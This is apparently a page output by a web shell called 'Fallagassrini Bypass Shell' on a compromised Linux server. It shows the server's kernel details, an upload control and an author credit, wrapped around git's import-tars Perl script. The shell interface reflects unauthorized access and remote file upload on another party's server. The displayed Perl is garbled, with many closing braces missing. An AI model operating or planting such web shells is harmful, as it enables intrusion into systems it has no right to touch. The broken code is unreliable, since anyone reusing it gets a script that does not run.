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Fallagassrini Bypass Shell

Current Path : /usr/share/doc/git-

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : //usr/share/doc/git-


## tar archive frontend for git-fast-import
## For example:
##  mkdir project; cd project; git init
##  perl import-tars.perl *.tar.bz2
##  git whatchanged import-tars
## Use --metainfo to specify the extension for a meta data file, where
## import-tars can read the commit message and optionally author and
## committer information.
##  echo 'This is the commit message' > myfile.tar.bz2.msg
##  perl import-tars.perl --metainfo=msg myfile.tar.bz2

use strict;
use Getopt::Long;

my $metaext = '';

die "usage: import-tars [--metainfo=extension] *.tar.{gz,bz2,lzma,xz,Z}\n"
	unless GetOptions('metainfo=s' => \$metaext) && @ARGV;

my $branch_name = 'import-tars';
my $branch_ref = "refs/heads/$branch_name";
my $author_name = $ENV{'GIT_AUTHOR_NAME'} || 'T Ar Creator';
my $author_email = $ENV{'GIT_AUTHOR_EMAIL'} || 'tar@example.com';
my $committer_name = $ENV{'GIT_COMMITTER_NAME'} || `git config --get user.name`;
my $committer_email = $ENV{'GIT_COMMITTER_EMAIL'} || `git config --get user.email`;

chomp($committer_name, $committer_email);

open(FI, '|-', 'git', 'fast-import', '--quiet')
	or die "Unable to start git fast-import: $!\n";
foreach my $tar_file (@ARGV)
	my $commit_time = time;
	$tar_file =~ m,([^/]+)$,;
	my $tar_name = $1;

	if ($tar_name =~ s/\.(tar\.gz|tgz)$//) {
		open(I, '-|', 'gunzip', '-c', $tar_file)
			or die "Unable to gunzip -c $tar_file: $!\n";
	} elsif ($tar_name =~ s/\.(tar\.bz2|tbz2)$//) {
		open(I, '-|', 'bunzip2', '-c', $tar_file)
			or die "Unable to bunzip2 -c $tar_file: $!\n";
	} elsif ($tar_name =~ s/\.tar\.Z$//) {
		open(I, '-|', 'uncompress', '-c', $tar_file)
			or die "Unable to uncompress -c $tar_file: $!\n";
	} elsif ($tar_name =~ s/\.(tar\.(lzma|xz)|(tlz|txz))$//) {
		open(I, '-|', 'xz', '-dc', $tar_file)
			or die "Unable to xz -dc $tar_file: $!\n";
	} elsif ($tar_name =~ s/\.tar$//) {
		open(I, $tar_file) or die "Unable to open $tar_file: $!\n";
	} else {
		die "Unrecognized compression format: $tar_file\n";

	my $author_time = 0;
	my $next_mark = 1;
	my $have_top_dir = 1;
	my ($top_dir, %files);

	while (read(I, $_, 512) == 512) {
		my ($name, $mode, $uid, $gid, $size, $mtime,
			$chksum, $typeflag, $linkname, $magic,
			$version, $uname, $gname, $devmajor, $devminor,
			$prefix) = unpack 'Z100 Z8 Z8 Z8 Z12 Z12
			Z8 Z1 Z100 Z6
			Z2 Z32 Z32 Z8 Z8 Z*', $_;
		last unless length($name);
		if ($name eq '././@LongLink') {
			# GNU tar extension
			if (read(I, $_, 512) != 512) {
				die ('Short archive');
			$name = unpack 'Z257', $_;
			next unless $name;

			my $dummy;
			if (read(I, $_, 512) != 512) {
				die ('Short archive');
			($dummy, $mode, $uid, $gid, $size, $mtime,
			$chksum, $typeflag, $linkname, $magic,
			$version, $uname, $gname, $devmajor, $devminor,
			$prefix) = unpack 'Z100 Z8 Z8 Z8 Z12 Z12
			Z8 Z1 Z100 Z6
			Z2 Z32 Z32 Z8 Z8 Z*', $_;
		next if $name =~ m{/\z};
		$mode = oct $mode;
		$size = oct $size;
		$mtime = oct $mtime;
		next if $typeflag == 5; # directory

		print FI "blob\n", "mark :$next_mark\n";
		if ($typeflag == 2) { # symbolic link
			print FI "data ", length($linkname), "\n", $linkname;
			$mode = 0120000;
		} else {
			print FI "data $size\n";
			while ($size > 0 && read(I, $_, 512) == 512) {
				print FI substr($_, 0, $size);
				$size -= 512;
		print FI "\n";

		my $path;
		if ($prefix) {
			$path = "$prefix/$name";
		} else {
			$path = "$name";
		$files{$path} = [$next_mark++, $mode];

		$author_time = $mtime if $mtime > $author_time;
		$path =~ m,^([^/]+)/,;
		$top_dir = $1 unless $top_dir;
		$have_top_dir = 0 if $top_dir ne $1;

	my $commit_msg = "Imported from $tar_file.";
	my $this_committer_name = $committer_name;
	my $this_committer_email = $committer_email;
	my $this_author_name = $author_name;
	my $this_author_email = $author_email;
	if ($metaext ne '') {
		# Optionally read a commit message from <filename.tar>.msg
		# Add a line on the form "Committer: name <e-mail>" to override
		# the committer and "Author: name <e-mail>" to override the
		# author for this tar ball.
		if (open MSG, '<', "${tar_file}.${metaext}") {
			my $header_done = 0;
			$commit_msg = '';
			while (<MSG>) {
				if (!$header_done && /^Committer:\s+([^<>]*)\s+<(.*)>\s*$/i) {
					$this_committer_name = $1;
					$this_committer_email = $2;
				} elsif (!$header_done && /^Author:\s+([^<>]*)\s+<(.*)>\s*$/i) {
					$this_author_name = $1;
					$this_author_email = $2;
				} elsif (!$header_done && /^$/) { # empty line ends header.
					$header_done = 1;
				} else {
					$commit_msg .= $_;
					$header_done = 1;
			close MSG;

	print FI <<EOF;
commit $branch_ref
author $this_author_name <$this_author_email> $author_time +0000
committer $this_committer_name <$this_committer_email> $commit_time +0000


	foreach my $path (keys %files)
		my ($mark, $mode) = @{$files{$path}};
		$path =~ s,^([^/]+)/,, if $have_top_dir;
		$mode = $mode & 0111 ? 0755 : 0644 unless $mode == 0120000;
		printf FI "M %o :%i %s\n", $mode, $mark, $path;
	print FI "\n";

	print FI <<EOF;
tag $tar_name
from $branch_ref
tagger $author_name <$author_email> $author_time +0000
Package $tar_name


	close I;
close FI;

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net